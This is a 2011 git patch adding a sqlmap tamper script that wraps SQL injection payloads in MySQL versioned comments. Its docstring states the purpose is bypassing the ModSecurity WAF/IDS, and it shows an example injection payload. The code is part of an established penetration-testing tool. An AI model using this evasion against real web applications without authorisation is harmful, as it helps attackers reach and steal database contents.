From 1cec29925cc6268c0e3613b888ddffc0cf0ed272 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 19 Oct 2011 22:07:23 +0000
Subject: [PATCH] added new tampering script by request

---
 tamper/modsecurityversioned.py | 47 ++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 tamper/modsecurityversioned.py

diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
new file mode 100644
index 000000000..d0cad407f
--- /dev/null
+++ b/tamper/modsecurityversioned.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Replaces ...
+
+    Example:
+        * Input: 1 AND 2>1--
+        * Output: 1 /*!30000AND 2>1*/--
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0
+
+    Notes:
+        * Useful to bypass ModSecurity WAF/IDS
+    """
+
+    retVal = payload
+
+    if payload:
+        postfix = ''
+        for comment in ('#', '--', '/*'):
+            if comment in payload:
+                postfix = payload[payload.find(comment):]
+                payload = payload[:payload.find(comment)]
+                break
+        if ' ' in payload:
+            retVal = "%s /*!30000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
+
+    return retVal